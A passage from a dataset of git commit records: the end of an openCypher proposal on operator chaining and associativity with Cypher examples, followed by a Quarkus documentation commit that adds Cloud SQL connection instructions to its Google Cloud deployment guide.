however, the grammar allows repetitions of such operators (chaining).\n\nFor instance, all the following are valid expressions:\n\n* `--+-5`\n* `5 + 4 + 3`\n* `5 - 4 - 3`\n* `5 - 4 + 3`\n* `5 * 4 \/ 3`\n* `5 % 4 * 3`\n* `5 > 4 >= 3`\n\nThe associativity of the operators defines the operator tree unambiguously for such expressions.\n\nChains of operators fall into four categories:\n\n* _Chains of type-incompatible operators_\n* _Chains of closed unary operators_\n* _Chains of binary operators_\n* _Chains with extra semantics_\n\nEach is discussed in the following subsections, respectively.\n\n==== Chains of type-incompatible operators\nThe grammar allows chaining of some operators in https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=StringListNullOperatorExpression[String, list, and null operators], which are\n\n* not type-compatible or\n* only type-compatible in one possible way,\n\nsuch that there is\n\n* no valid operator tree or\n* only one unambiguous operator tree,\n\nrespectively.\n\nFor instance, grammatically allowed operator chains without a valid operator tree are:\n\n* `'string' STARTS WITH x [1..3]`\n** `('string' STARTS WITH x) [1..3]` is invalid because list slicing does not accept a boolean as first operand\n** `'string' STARTS WITH (x[1..3])` is invalid because the prefix predicate does not accept a list as second operand\n* `foo CONTAINS 'bar' ENDS WITH x`\n** `(foo CONTAINS 'bar') ENDS WITH x` is invalid because the suffix predicate does not accept a boolean as first operand\n** `foo CONTAINS ('bar' ENDS WITH x)` is invalid because the containment predicate does not accept a boolean as second operand\n\nFor instance, grammatically allowed operator chains with only a single valid operator tree are:\n\n* `foo STARTS WITH x IS NOT NULL`\n** `(foo STARTS WITH x) IS NOT NULL` is valid because the not-null predicate accepts a boolean as first operand\n** `foo STARTS WITH (x IS NOT NULL)` is invalid because the prefix predicate does not accept a boolean as second operand\n* `foo CONTAINS 'bar' IN list`\n** `(foo CONTAINS 'bar') IN list` is valid because the list element containment predicate accepts a boolean as first operand\n** `foo CONTAINS ('bar' IN list)` is invalid because the containment predicate does not accept a boolean as second operand\n\n[IMPORTANT]\n.Chains of type-incompatible operators\n====\nChains of (partly) type-incompatible operators 
\n==== Chains of closed unary operators\nClosed unary operators that allow chaining on the same precedence level are\n\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=UnaryAddOrSubtractExpression[Arithmetic additive inverse]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=NotExpression[Boolean negation]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ListOperatorExpression[List slicing]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=NullOperatorExpression[Null predicates]\n\nExample expressions are\n\n* `--+-5`\n* `NOT NOT NOT false`\n* `list[4..17][2..5]`\n* `x IS NOT NULL IS NOT NULL IS NULL`\n\n[IMPORTANT]\n.Chaining of closed unary operators\n====\nChains of closed unary operators have an unambiguous operator tree.\n====\n\n[NOTE]\n.Associativity of unary operators\n====\nThe grammar defines whether the operand of a unary operator is on the left end or on the right end of the operator's syntax.\nThis renders the operator left- or right-associative, respectively.\nNevertheless, the grammar allows only one unambiguous operator tree, in both cases.\n====\n\n\n==== Chains of binary operators\nBinary operators that allow chaining with themselves or other operators of compatible result type on the same precedence level are\n\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=PowerOfExpression[Exponentiation]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=MultiplyDivideModuloExpression[Multiplication]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=MultiplyDivideModuloExpression[Division]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=MultiplyDivideModuloExpression[Remainder (Modulo)]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=AddOrSubtractExpression[Addition]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=AddOrSubtractExpression[Subtraction]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=AndExpression[Boolean conjunction]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=OrExpression[Boolean inclusive disjunction]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=XorExpression[Boolean exclusive disjunction]\n\nExample expressions are\n\n* `5 * 4 * 3`\n* `5 ^ 4 ^ 3`\n* `5 \/ 4 \/ 3`\n* `5 % 4 % 3`\n* `5 % 4 * 3`\n* `5 - 4 - 3`\n* `5 - 4 + 3`\n* `5 + 4 + 3`\n* `TRUE AND FALSE AND TRUE`\n* `TRUE OR FALSE OR TRUE`\n* `TRUE XOR FALSE XOR TRUE`\n\n[IMPORTANT]\n.Chains of binary operators\n====\nIn chains of binary operators, the operators have left-to-right associativity, i.e. for every two operators, the operator appearing earlier (further left) in the query string takes precedence and the operator tree is left-deep.\n====\n
\n[NOTE]\n.Associative binary operators\n====\nWhere the semantics of an operator is associative (e.g. addition), a right-deep operator tree produces the same result as a left-deep operator tree.\n====\n\nConsequently, the examples evaluate as follows:\n\n[cols=\"2a,1a\"]\n|====\n|\n[source, cypher]\n----\nRETURN 5 * 4 * 3 AS a,\n (5 * 4)* 3 AS b,\n 5 *(4 * 3) AS c\n----\n|\n[options=\"header\"]\n!====\n!a !b !c\n!60!60!60\n!====\n\n|\n[source, cypher]\n----\nRETURN 4 ^ 3 ^ 2 AS a,\n (4 ^ 3)^ 2 AS b,\n 4 ^(3 ^ 2) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! 4096.0 ! 4096.0 ! 262144.0\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 \/ 4 \/ 3 AS a,\n (5 \/ 4)\/ 3 AS b,\n 5 \/(4 \/ 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! 0 ! 0 ! 5\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 % 4 % 3 AS a,\n (5 % 4)% 3 AS b,\n 5 %(4 % 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! 1 ! 1 ! 0\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 % 4 * 3 AS a,\n (5 % 4)* 3 AS b,\n 5 %(4 * 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! 3 ! 3 ! 5\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 - 4 - 3 AS a,\n (5 - 4)- 3 AS b,\n 5 -(4 - 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! -2 ! -2 ! 4\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 - 4 + 3 AS a,\n (5 - 4)+ 3 AS b,\n 5 -(4 + 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! 4 ! 4 ! -2\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 + 4 + 3 AS a,\n (5 + 4)+ 3 AS b,\n 5 +(4 + 3) AS c\n----\n|\n[options=\"header\"]\n!====\n!a !b !c\n!12!12!12\n!====\n\n|\n[source, cypher]\n----\nRETURN TRUE AND FALSE AND TRUE AS a,\n (TRUE AND FALSE) AND TRUE AS b,\n TRUE AND (FALSE AND TRUE) AS c\n----\n|\n[options=\"header\"]\n!====\n!a !b !c\n!false!false!false\n!====\n\n|\n[source, cypher]\n----\nRETURN TRUE OR FALSE OR TRUE AS a,\n (TRUE OR FALSE) OR TRUE AS b,\n TRUE OR (FALSE OR TRUE) AS c\n----\n|\n[options=\"header\"]\n!====\n!a !b !c\n!true!true!true\n!====\n\n|\n[source, cypher]\n----\nRETURN TRUE XOR FALSE XOR TRUE AS a,\n (TRUE XOR FALSE) XOR TRUE AS b,\n TRUE XOR (FALSE XOR TRUE) AS c\n----\n|\n[options=\"header\"]\n!====\n!a !b !c\n!false!false!false\n!====\n\n|====\n\n==== Chains with extra semantics\nOperators whose chaining gives extra semantics are\n\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ComparisonExpression[Comparison operations]\n\nExample expressions are\n\n* `5 = 5 = 5`\n* `5 = 4 <> 3`\n* `5 <> 4 > 3`\n* `5 > 4 > 3`\n* `5 > 4 >= 3`\n* `5 <= 4 < 3`\n\n[IMPORTANT]\n.Chains with extra semantics\n====\nChains with extra semantics either\n\na. form a flat operator tree of a single operator, or\nb. have semantics defined by a syntax transformation to an expression that has an unambiguous operator tree based on the other precedence rules stated in this document.\n====\n\n[NOTE]\n.Associativity of comparison operators\n====\nBecause of the extra semantics of a chain of comparisons, the comparison operators do not have any observable associativity in openCypher.\n====\n\nConsequently, the examples evaluate as follows:\n\n[cols=\"2a,1a\"]\n|====\n|\n[source, cypher]\n----\nRETURN 5 = 5 = 5 AS a,\n (5 = 5) AND (5 = 5) AS ax,\n (5 = 5)= 5 AS b,\n 5 =(5 = 5) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! true ! true ! false ! 
false\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 = 4 <> 3 AS a,\n (5 = 4) AND (4 <> 3) AS ax,\n (5 = 4)<> 3 AS b,\n 5 =(4 <> 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! false ! false ! true ! false\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 <> 4 > 3 AS a,\n (5 <> 4) AND (4 > 3) AS ax,\n (5 <> 4)> 3 AS b,\n 5 <>(4 > 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! true ! true ! null ! true\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 > 4 > 3 AS a,\n (5 > 4) AND (4 > 3) AS ax,\n (5 > 4)> 3 AS b,\n 5 >(4 > 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! true ! true ! null ! null\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 > 4 >= 3 AS a,\n (5 > 4) AND (4 >= 3) AS ax,\n (5 > 4)>= 3 AS b,\n 5 >(4 >= 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! true ! true ! null ! null\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 <= 4 < 3 AS a,\n (5 <= 4) AND (4 < 3) AS ax,\n (5 <= 4)< 3 AS b,\n 5 <=(4 < 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! false ! false ! null ! null\n!====\n\n|====\n\n== What others do\n\nopenCypher grammatically arranges all operators in one precedence level hierarchy.\nThis is similar to how precedence is defined for most programming languages.\nFor instance:\n\n* https:\/\/docs.oracle.com\/javase\/tutorial\/java\/nutsandbolts\/operators.html[Java]\n* https:\/\/docs.python.org\/3\/reference\/expressions.html#operator-precedence[Python]\n* https:\/\/en.cppreference.com\/w\/cpp\/language\/operator_precedence[C++]\n* https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/JavaScript\/Reference\/Operators\/Operator_Precedence#table[Javascript]\n\nThe precedence is similar.\nSome minor differences:\n\n* Programming languages have extra operators openCypher does not have, e.g. increment\/decrement, bitwise operators, ternary operator, and assignments\n* In Javascript, exponentiation is right-to-left associative\n\nSQL encodes large parts of the type compatibility of expressions in the grammar.\nHence, its precedence hierarchy is partitioned by type.\nWithin one type, SQL's precedence hierarchy is similar.\n\nChainable operators, such as addition, multiplication, etc. 
are left-to-right associative in SQL as well.\nHowever, SQL directly encodes that in the grammar, with left-recursive production rules, e.g.\n\n[source, ebnf]\n----\n<numeric value expression> ::=\n <term>\n | <numeric value expression> <plus sign> <term>\n | <numeric value expression> <minus sign> <term>\n\n<term> ::=\n <factor>\n | <term> <asterisk> <factor>\n | <term> <solidus> <factor>\n\n<factor> ::=\n [ <sign> ] <numeric primary>\n----\n\nMost programming and query languages do not give chains of comparison operators extra semantics.\nTypically, comparison operators are left-to-right associative.\n\n== Benefits to this proposal\n\nThis CIP clarifies the precedence rules of openCypher.\n\n== Caveats to this proposal\n\nNone known.\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f91ac6f7afef5617c6ddbbce600bfd59f3d32e2a","subject":"Document how to connect to cloud SQL","message":"Document how to connect to cloud SQL\n\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/deploying-to-google-cloud.adoc","new_file":"docs\/src\/main\/asciidoc\/deploying-to-google-cloud.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Deploying to Google Cloud Platform (GCP)\n\ninclude::.\/attributes.adoc[]\n\nThis guide covers:\n\n* Login to Google Cloud\n* Deploying a function to Google Cloud Functions\n* Deploying a JAR to Google App Engine Standard\n* Deploying a Docker image to Google App Engine Flexible Custom Runtimes\n* Deploying a Docker image to Google Cloud Run\n* Using Cloud SQL\n\n== Prerequisites\n\nFor this guide you need:\n\n* Roughly 1 hour for all modalities\n* JDK 11\n* Apache Maven {maven-version}\n* https:\/\/cloud.google.com\/[A Google Cloud Account]. Free accounts work.\n* https:\/\/cloud.google.com\/sdk[Cloud SDK CLI Installed]\n\nThis guide will take as input an application developed in the link:getting-started[Getting Started guide].\n\nMake sure you have the getting-started application at hand, or clone the Git repository: `git clone {quickstarts-clone-url}`,\nor download an {quickstarts-archive-url}[archive]. The solution is located in the `getting-started` directory.\n
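\nFor example, a minimal sketch of fetching and building it (the checkout directory name `quarkus-quickstarts` is an assumption here; the clone URL comes from the `{quickstarts-clone-url}` attribute):\n\n[source, shell script, subs=attributes+]\n----\ngit clone {quickstarts-clone-url}\ncd quarkus-quickstarts\/getting-started\nmvn clean package\n----\n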
\n== Login to Google Cloud\n\nLogging in to Google Cloud is necessary for deploying the application; it can be done as follows:\n\n[source, subs=attributes+]\n----\ngcloud auth login\n----\n\n== Deploying to Google Cloud Functions\n\nQuarkus supports deploying your application to Google Cloud Functions via the following extensions:\n\n- link:gcp-functions[Google Cloud Functions]: Build functions using the Google Cloud Functions API.\n- link:gcp-functions-http[Google Cloud Functions HTTP binding]: Build functions using Quarkus HTTP APIs: RESTEasy (JAX-RS),\nUndertow (Servlet), Vert.x Web, or link:funqy-http[Funqy HTTP].\n- link:funqy-gcp-functions[Funqy Google Cloud Functions]: Build functions using Funqy.\n\nEach extension supports a specific kind of application development;\nfollow the specific guides for more information on how to develop, package and deploy your applications using them.\n\n== Deploying to Google App Engine Standard\n\nWe will only cover the Java 11 runtime, as the Java 8 runtime uses its own Servlet engine which is not compatible with Quarkus.\n\nFirst of all, make sure to have an App Engine environment initialized for your Google Cloud project; if not, initialize one via `gcloud app create --project=[YOUR_PROJECT_ID]`.\n\nThen, you will need to create a `src\/main\/appengine\/app.yaml` file; let's keep it minimalistic with only the selected engine:\n\n[source, yaml]\n----\nruntime: java11\n----\n\nThis will create a default service for your App Engine application.\n\nThen, you can choose to build the application by yourself, or let `gcloud` or the Google Cloud Maven plugin build it for you.\n\n=== Building the application manually\n\nSet up your application to be packaged as an uber-jar via your `application.properties` file:\n\n[source, properties]\n----\nquarkus.package.type=uber-jar\n----\n\nUse Maven to build the application using `mvn clean package`; it will generate a single JAR that contains all the classes of your application including its dependencies.\n\nFinally, use `gcloud` to deploy your application as an App Engine service.\n\n[source, shell script]\n----\ngcloud app deploy target\/getting-started-1.0.0-SNAPSHOT-runner.jar\n----\n\nThis command will upload your application jar and launch it on App Engine.\n\nWhen done, the output will display the URL of your application (target URL); you can use it with curl or directly open it in your browser using `gcloud app browse`.\n\n=== Building the application via gcloud\n\nYou can choose to let `gcloud` build your application for you; this is the simplest way to deploy to App Engine.\n\nJust launch `gcloud app deploy` in the root of your project; it will upload all your project files (the list can be reduced via the `.gcloudignore` file),\npackage your JAR via Maven (or Gradle) and launch it on App Engine.\n\nWhen done, the output will display the URL of your application (target URL); you can use it with curl or directly open it in your browser using `gcloud app browse`.\n\n=== Building the application via the Google Cloud Maven plugin\n\nYou can also let Maven control the deployment of your application using the App Engine Maven plugin.\n\nFirst, add the plugin to your `pom.xml`:\n\n[source,xml]\n----\n<plugin>\n <groupId>com.google.cloud.tools<\/groupId>\n <artifactId>appengine-maven-plugin<\/artifactId>\n <version>2.4.0<\/version>\n <configuration>\n <projectId>GCLOUD_CONFIG<\/projectId> <1>\n <version>gettingstarted<\/version>\n 
<artifact>${project.build.directory}\/getting-started-${project.version}-runner.jar<\/artifact> <2>\n <\/configuration>\n<\/plugin>\n----\n\n1. Use the default `gcloud` configuration\n2. Override the default JAR name to the one generated by the Quarkus Maven plugin\n\nThen you can use Maven to build and deploy your application to App Engine via `mvn clean package appengine:deploy`.\n\nWhen it\u2019s done, the output will display the URL of your application (target URL); you can use it with curl or directly open it in your browser using `gcloud app browse`.\n\n== Deploying to Google App Engine Flexible Custom Runtimes\n\nBefore anything else, make sure to have an App Engine environment initialized for your Google Cloud project; if not, initialize one via `gcloud app create --project=[YOUR_PROJECT_ID]`.\n\nApp Engine Flexible Custom Runtimes uses a Docker image to run your application.\n\nFirst, create an `app.yaml` file at the root of your project with the following content:\n\n[source, yaml]\n----\nruntime: custom\nenv: flex\n----\n\nApp Engine Flexible Custom Runtimes deploys your application as a Docker container; you can choose to deploy one of the Dockerfiles provided inside your application.\n\nBoth JVM and native executable versions will work.\n\nTo deploy a JVM application:\n\n- Copy the JVM Dockerfile to the root directory of your project: `cp src\/main\/docker\/Dockerfile.jvm Dockerfile`.\n- Build your application using `mvn clean package`.\n\nTo deploy a native application:\n\n- Copy the native Dockerfile to the root directory of your project: `cp src\/main\/docker\/Dockerfile.native Dockerfile`.\n- Build your application as a native executable using `mvn clean package -Dnative`.\n\nFinally, launch `gcloud app deploy` in the root of your project; it will upload all your project files (the list can be reduced via the `.gcloudignore` file),\nbuild your Dockerfile, and launch it on the App Engine Flexible custom runtime.\n\nIt uses Cloud Build to build your Docker image and deploy it to Google Container Registry (GCR).\n\nWhen done, the output will display the URL of your application (target URL); you can use it with curl or directly open it in your browser using `gcloud app browse`.\n\nNOTE: App Engine Flexible custom runtimes support link:https:\/\/cloud.google.com\/appengine\/docs\/flexible\/custom-runtimes\/configuring-your-app-with-app-yaml#updated_health_checks[health checks];\nit is strongly advised to provide them thanks to Quarkus link:microprofile-health[MicroProfile Health] support.\n\n== Deploying to Google Cloud Run\n\nGoogle Cloud Run allows you to run your Docker containers inside Google Cloud Platform in a managed way.\n\nNOTE: By default, Quarkus listens on port 8080, which is also the Cloud Run default port.\nThere is no need to use the `PORT` environment variable defined in Cloud Run to customize the Quarkus HTTP port.\n\nCloud Run will use Cloud Build to build your Docker image and deploy it to Google Container Registry (GCR).\n\nBoth JVM and native executable versions will work.\n\nTo deploy a JVM application:\n\n- Copy the JVM Dockerfile to the root directory of your project: `cp src\/main\/docker\/Dockerfile.jvm Dockerfile`.\n- Build your application using `mvn clean package`.\n\nTo deploy a native application:\n\n- Copy the native Dockerfile to the root directory of your project: `cp src\/main\/docker\/Dockerfile.native Dockerfile`.\n- Build your application as a native executable using `mvn clean package -Dnative`.\n\nThen, create a `.gcloudignore` file to tell gcloud 
which files should not be uploaded for Cloud Build;\nwithout it, it defaults to `.gitignore`, which usually excludes the target directory where your packaged application has been created.\n\nIn this example, I only exclude the `src` directory:\n\n[source]\n----\nsrc\/\n----\n\nThen, use Cloud Build to build your image; it will upload all the files of your application (except the ones ignored by the `.gcloudignore` file) to a Google Cloud Storage bucket,\nbuild your Docker image, and push it to Google Container Registry (GCR).\n\n[source, shell script]\n----\ngcloud builds submit --tag gcr.io\/PROJECT-ID\/helloworld\n----\n\nNOTE: You can also build your image locally and push it to a publicly accessible Docker registry, then use this image in the next step.\n\nFinally, use Cloud Run to launch your application.\n\n[source, shell script]\n----\ngcloud run deploy --image gcr.io\/PROJECT-ID\/helloworld --platform managed\n----\n\nCloud Run will ask you about the service name, the region, and whether or not unauthenticated calls are allowed.\nAfter you answer these questions, it will deploy your application.\n\nWhen the deployment is done, the output will display the URL to access your application.\n\n== Using Cloud SQL\n\nGoogle Cloud SQL provides managed instances for MySQL, PostgreSQL and SQL Server.\nQuarkus has support for all three databases.\n\nTo make them work with Cloud SQL, you first need to use the corresponding JDBC extension; for example, for PostgreSQL,\nadd the `jdbc-postgresql` extension.\n\nThen you need to add to your pom.xml the Cloud SQL JDBC library that provides the connectivity to Cloud SQL;\nfor PostgreSQL you'll need to include the following dependency:\n\n[source, xml]\n----\n<dependency>\n <groupId>com.google.cloud.sql<\/groupId>\n <artifactId>postgres-socket-factory<\/artifactId>\n <version>${postgres-socket-factory.version}<\/version>\n<\/dependency>\n----\n\nFinally, you need to configure your datasource specifically to use the socket factory:\n\n[source, properties]\n----\nquarkus.datasource.db-kind=other #<1>\nquarkus.datasource.jdbc.url=jdbc:postgresql:\/\/\/mydatabase #<2>\nquarkus.datasource.jdbc.driver=org.postgresql.Driver\nquarkus.datasource.username=quarkus\nquarkus.datasource.password=quarkus\nquarkus.datasource.jdbc.additional-jdbc-properties.cloudSqlInstance=project-id:gcp-region:instance #<3>\nquarkus.datasource.jdbc.additional-jdbc-properties.socketFactory=com.google.cloud.sql.postgres.SocketFactory #<4>\n----\n\n1. Database kind must be 'other' as we need to skip Quarkus auto-configuration.\n2. The JDBC URL should not include the hostname \/ IP of the database.\n3. We add the `cloudSqlInstance` additional JDBC property to configure the instance id.\n4. We add the `socketFactory` additional JDBC property to configure the socket factory used to connect to Cloud SQL,\nwhich comes from the `postgres-socket-factory` dependency.\n
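\nThe `${postgres-socket-factory.version}` placeholder used in the dependency snippet above is assumed to be defined in the `properties` section of your `pom.xml`; a minimal sketch (the version number is illustrative only, check for the latest release):\n\n[source, xml]\n----\n<properties>\n <postgres-socket-factory.version>1.2.0<\/postgres-socket-factory.version>\n<\/properties>\n----\n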
\nNOTE: If you use Hibernate, you also need to configure `quarkus.hibernate-orm.dialect=org.hibernate.dialect.PostgreSQL10Dialect` as Hibernate\nwould not be able to automatically detect the dialect of your database.\n\nWARNING: Using a PostgreSQL socket factory is not possible in dev mode due to link:https:\/\/github.com\/quarkusio\/quarkus\/issues\/15782[#15782].\n\n== Going further\n\nYou can find a set of extensions to access various Google Cloud Services in the Quarkiverse (a GitHub organization for Quarkus extensions maintained by the community),\nincluding PubSub, BigQuery, Storage, Spanner, Firestore, Secret Manager (visit the repository for an accurate list of supported services).\n\nYou can find some documentation about them in the link:https:\/\/github.com\/quarkiverse\/quarkiverse-google-cloud-services[Quarkiverse Google Cloud Services repository].\n","old_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Deploying to Google Cloud Platform (GCP)\n\ninclude::.\/attributes.adoc[]\n\nThis guide covers:\n\n* Login to Google Cloud\n* Deploying a function to Google Cloud Functions\n* Deploying a JAR to Google App Engine Standard\n* Deploying a Docker image to Google App Engine Flexible Custom Runtimes\n* Deploying a Docker image to Google Cloud Run\n\n== Prerequisites\n\nFor this guide you need:\n\n* Roughly 1 hour for all modalities\n* JDK 11\n* Apache Maven {maven-version}\n* https:\/\/cloud.google.com\/[A Google Cloud Account]. Free accounts work.\n* https:\/\/cloud.google.com\/sdk[Cloud SDK CLI Installed]\n\nThis guide will take as input an application developed in the link:getting-started[Getting Started guide].\n\nMake sure you have the getting-started application at hand, or clone the Git repository: `git clone {quickstarts-clone-url}`,\nor download an {quickstarts-archive-url}[archive]. 
The solution is located in the `getting-started` directory.\n\n== Login to Google Cloud\n\nLogin to Google Cloud is necessary for deploying the application and it can be done as follows:\n\n[source, subs=attributes+]\n----\ngcloud auth login\n----\n\n== Deploying to Google Cloud Functions\n\nQuarkus supports deploying your application to Google Cloud Functions via the following extensions:\n\n- link:gcp-functions[Google Cloud Functions]: Build functions using the Google Cloud Functions API.\n- link:gcp-functions-http[Google Cloud Functions HTTP binding]: Build functions using Quarkus HTTP APIs: RESTEasy (JAX-RS),\nUndertow (Servlet), Vert.x Web, or link:funqy-http[Funqy HTTP].\n- link:funqy-gcp-functions[Funky Google Cloud Functions]: Build functions using Funqy.\n\nEach extension supports a specific kind of application development,\nfollow the specific guides for more information on how to develop, package and deploy your applications using them.\n\n== Deploying to Google App Engine Standard\n\nWe will only cover the Java 11 runtime as the Java 8 runtime uses its own Servlet engine which is not compatible with Quarkus.\n\nFirst of all, make sure to have an App Engine environment initialized for your Google Cloud project, if not, initialize one via `gcloud app create --project=[YOUR_PROJECT_ID]`.\n\nThen, you will need to create a `src\/main\/appengine\/app.yaml` file, let's keep it minimalistic with only the selected engine:\n\n[source, yaml]\n----\nruntime: java11\n----\n\nThis will create a default service for your App Engine application.\n\nThen, you can choose to build the application by yourself or letting `gcloud` or the Google Cloud Maven plugin build it for you.\n\n=== Building the application manually\n\nSet up your application to be packaged as an uber-jar via your `application.properties` file:\n\n[source, properties]\n----\nquarkus.package.type=uber-jar\n----\n\nUse Maven to build the application using `mvn clean package`, it will generate a single JAR that contains all the classes of your application including its dependencies.\n\nFinally, use `gcloud` to deploy your application as an App Engine service.\n\n[source, shell script]\n----\ngcloud app deploy target\/getting-started-1.0.0-SNAPSHOT-runner.jar\n----\n\nThis command will upload your application jar and launch it on App Engine.\n\nWhen done, the output will display the URL of your application (target url), you can use it with curl or directly open it in your browser using `gcloud app browse`.\n\n=== Building the application via gcloud\n\nYou can choose to let `gcloud` build your application for you, this is the simplest way to deploy to App Engine.\n\nJust launch `gcloud app deploy` in the root of your project, it will upload all your project files (the list can be reduced via the `.gcloudignore` file),\npackage your JAR via Maven (or Gradle) and launch it on App Engine.\n\nWhen done, the output will display the URL of your application (target url), you can use it with curl or directly open it in your browser using `gcloud app browse`.\n\n=== Building the application via the Google Cloud Maven plugin\n\nYou can also let Maven control the deployment of your application using the App Engine Maven plugin.\n\nFirst, add the plugin to your `pom.xml`:\n\n[source,xml]\n----\n<plugin>\n <groupId>com.google.cloud.tools<\/groupId>\n <artifactId>appengine-maven-plugin<\/artifactId>\n <version>2.4.0<\/version>\n <configuration>\n <projectId>GCLOUD_CONFIG<\/projectId> <1>\n <version>gettingstarted<\/version>\n 
<artifact>${project.build.directory}\/getting-started-${project.version}-runner.jar<\/artifact> <2>\n <\/configuration>\n<\/plugin>\n----\n\n1. Use the default `gcloud` configuration\n2. Override the default JAR name to the one generated by the Quarkus Maven plugin\n\nThen you would be able to use Maven to build and deploy your application to App Engine via `mvn clean package appengine:deploy`.\n\nWhen it\u2019s done, the output will display the URL of your application (target URL), you can use it with curl or directly open it in your browser using `gcloud app browse`.\n\n== Deploying to Google App Engine Flexible Custom Runtimes\n\nBefore all, make sure to have an App Engine environment initialized for your Google Cloud project, if not, initialize one via `gcloud app create --project=[YOUR_PROJECT_ID]`.\n\nApp Engine Flexible Custom Runtimes uses a Docker image to run your application.\n\nFirst, create an `app.yaml` file at the root of your project with the following content:\n\n[source, yaml]\n----\nruntime: custom\nenv: flex\n----\n\nApp Engine Flexible Custom Runtimes deploys your application as a Docker container, you can choose to deploy one of the Dockerfile provided inside your application.\n\nBoth JVM and native executable versions will work.\n\nTo deploy a JVM application:\n\n- Copy the JVM Dockerfile to the root directory of your project: `cp src\/main\/docker\/Dockerfile.jvm Dockerfile`.\n- Build your application using `mvn clean package`.\n\nTo deploy a native application:\n\n- Copy the native Dockerfile to the root directory of your project: `cp src\/main\/docker\/Dockerfile.native Dockerfile`.\n- Build your application as a native executable using `mvn clean package -Dnative`.\n\nFinally, launch `gcloud app deploy` in the root of your project, it will upload all your project files (the list can be reduced via the `.gcloudignore` file),\nbuild your Dockerfile and launch it on App Engine Flexible custom runtime.\n\nIt uses Cloud Build to build your Docker image and deploy it to Google Container Registry (GCR).\n\nWhen done, the output will display the URL of your application (target url), you can use it with curl or directly open it in your browser using `gcloud app browse`.\n\nNOTE: App Engine Flexible custom runtimes support link:https:\/\/cloud.google.com\/appengine\/docs\/flexible\/custom-runtimes\/configuring-your-app-with-app-yaml#updated_health_checks[health checks],\nit is strongly advised to provide them thanks to Quarkus link:microprofile-health[Microprofile Health] support.\n\n== Deploying to Google Cloud Run\n\nGoogle Cloud Run allows you to run your Docker containers inside Google Cloud Platform in a managed way.\n\nNOTE: By default, Quarkus listens on port 8080, and it's also the Cloud Run default port.\nNo need to use the `PORT` environment variable defined in Cloud Run to customize the Quarkus HTTP port.\n\nCloud Run will use Cloud Build to build your Docker image and deploy it to Google Container Registry (GCR).\n\nBoth JVM and native executable versions will work.\n\nTo deploy a JVM application:\n\n- Copy the JVM Dockerfile to the root directory of your project: `cp src\/main\/docker\/Dockerfile.jvm Dockerfile`.\n- Build your application using `mvn clean package`.\n\nTo deploy a native application:\n\n- Copy the native Dockerfile to the root directory of your project: `cp src\/main\/docker\/Dockerfile.native Dockerfile`.\n- Build your application as a native executable using `mvn clean package -Dnative`.\n\nThen, create a `.gcloudignore` file to tell gcloud 
